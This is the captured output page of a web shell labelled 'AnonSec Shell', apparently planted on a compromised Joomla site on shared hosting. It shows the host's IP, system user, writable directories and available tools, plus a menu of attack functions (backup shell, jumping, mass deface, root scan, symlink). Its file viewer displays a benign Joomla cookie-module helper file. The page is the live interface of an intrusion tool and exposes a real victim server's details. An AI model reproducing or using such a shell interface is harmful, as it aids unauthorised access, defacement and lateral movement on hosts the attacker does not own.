AnonSec Shell
Server IP : 87.98.231.4  /  Your IP : 216.73.217.178   [ Reverse IP ]
Web Server : Apache
System : Linux webm007.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : grupmartgn ( 667608)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/grupmartgn/elanartcrafts/modules/mod_jbcookies/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/grupmartgn/elanartcrafts/modules/mod_jbcookies/helper.php
<?php
/**
 * @package			Joomla.Site
 * @subpackage		Modules - mod_jbcookies
 *
 * @author			JoomBall! Project
 * @link			http://www.joomball.com
 * @copyright		Copyright © 2011-2018 JoomBall! Project. All Rights Reserved.
 * @license			GNU/GPL, http://www.gnu.org/licenses/gpl-3.0.html
 */

defined('_JEXEC') or die;

class modJBCookiesHelper
{
	public static function getAjax()
	{
		$app = JFactory::getApplication();
		$extensions = $app->input->get('extensions', '', 'string');
		$conf = JFactory::getConfig();
		
		$options = array(
				'defaultgroup' => '',
				'storage'      => $conf->get('cache_handler', ''),
				'caching'      => true,
				'cachebase'    => $conf->get('cache_path', JPATH_SITE . '/cache')
		);
		
		$cache = JCache::getInstance('', $options);
		
		foreach (explode(',', $extensions) as $ext) {
			$cache->clean($ext);
		}
		
//		echo '1'; //json_encode($data);
		
		$app->close();
	}
}
?>

Anon7 - 2022
AnonSec Team